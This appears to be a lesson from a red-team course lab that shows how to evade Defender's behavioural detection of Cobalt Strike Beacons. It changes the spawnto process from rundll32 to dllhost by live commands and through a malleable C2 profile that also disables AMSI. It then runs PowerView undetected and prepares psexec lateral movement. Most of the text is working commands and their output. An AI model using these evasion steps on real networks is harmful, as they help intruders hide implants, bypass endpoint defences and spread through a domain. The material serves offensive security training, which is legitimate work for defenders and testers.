Behavioural Detections

When dealing with behavioural detections, the Defender alerts look something like this:

PSComputerName                 : fs
ProcessName                    : C:\Windows\System32\rundll32.exe
RemediationTime                : 9/14/2022 5:40:03 PM
Resources                      : {behavior:_pid:4964:111820579542652, 
                                 process:_pid:4040,ProcessStart:133076508002529669, 
                                 process:_pid:4964,ProcessStart:133076507626927382}

The Beacon running on the file server is living inside the rundll32 process (PID 4404). When Cobalt Strike runs a post-ex command that uses the fork & run pattern, it will spawn a sacrificial process, inject the post-ex capability into it, retrieve the output over a named pipe, and then kill the process. The primary reason to do this is to ensure that unstable post-ex tools don't crash the Beacon.

rundll32 being the default "spawnto" for Cobalt Strike has been a thing for a long time and is now a common point of detection. The service binary payload used by psexec also uses this by default, which is why you see those Beacons running as rundll32.exe.

The process used for post-ex commands and psexec can be changed on the fly in the CS GUI. To change the post-ex process, use the spawnto command. x86 and x64 must be specified individually and environment variables can also be used.

beacon> spawnto x64 %windir%\sysnative\dllhost.exe
beacon> spawnto x86 %windir%\syswow64\dllhost.exe

The sysnative and syswow64 paths should be used rather than system32.

If we then use powerpick to get its own process name, it will return dllhost.

beacon> powerpick Get-Process -Id $pid | select ProcessName

ProcessName
-----------
dllhost    

powerpick + PowerView will now run on the file server without being caught by AMSI or this behavioural detection.

beacon> run hostname
fs

beacon> powershell-import C:\Tools\PowerSploit\Recon\PowerView.ps1
beacon> powerpick Get-Domain

Forest                  : cyberbotic.io
DomainControllers       : {dc-2.dev.cyberbotic.io}
Children                : {}
DomainMode              : Unknown
DomainModeLevel         : 7
Parent                  : cyberbotic.io
PdcRoleOwner            : dc-2.dev.cyberbotic.io
RidRoleOwner            : dc-2.dev.cyberbotic.io
InfrastructureRoleOwner : dc-2.dev.cyberbotic.io
Name                    : dev.cyberbotic.io

Use the spawnto command without any argument to reset back to default.

beacon> spawnto
[*] Tasked beacon to spawn features to default process

You may also set the spawnto inside malleable C2 by including the spawnto_x64 and spawnto_x86 directives inside the post-ex block. Every new Beacon will then use this as their new default.

post-ex {
        set amsi_disable "true";

        set spawnto_x64 "%windir%\\sysnative\\dllhost.exe";
        set spawnto_x86 "%windir%\\syswow64\\dllhost.exe";
}

When moving laterally with psexec, Beacon will attempt to use the spawnto setting from your malleable C2 profile. However, it cannot use environment variables (such as %windir%), so will fall back to rundll32 in those cases. You can override this at runtime with the ak-settings command to specify an absolute path instead.

beacon> ak-settings spawnto_x64 C:\Windows\System32\dllhost.exe
[*] Updating the spawnto_x64 process to 'C:\Windows\System32\dllhost.exe'
[*] artifact kit settings:
[*]    service     = ''
[*]    spawnto_x86 = 'C:\Windows\SysWOW64\rundll32.exe'
[*]    spawnto_x64 = 'C:\Windows\System32\dllhost.exe'

beacon> ak-settings spawnto_x86 C:\Windows\SysWOW64\dllhost.exe
[*] Updating the spawnto_x86 process to 'C:\Windows\SysWOW64\dllhost.exe'
[*] artifact kit settings:
[*]    service     = ''
[*]    spawnto_x86 = 'C:\Windows\SysWOW64\dllhost.exe'
[*]    spawnto_x64 = 'C:\Windows\System32\dllhost.exe'

You may also change the name of the service (rather than 7 random characters) with ak-settings service [name].

Lateral movement with psexec will then land us in dllhost.exe.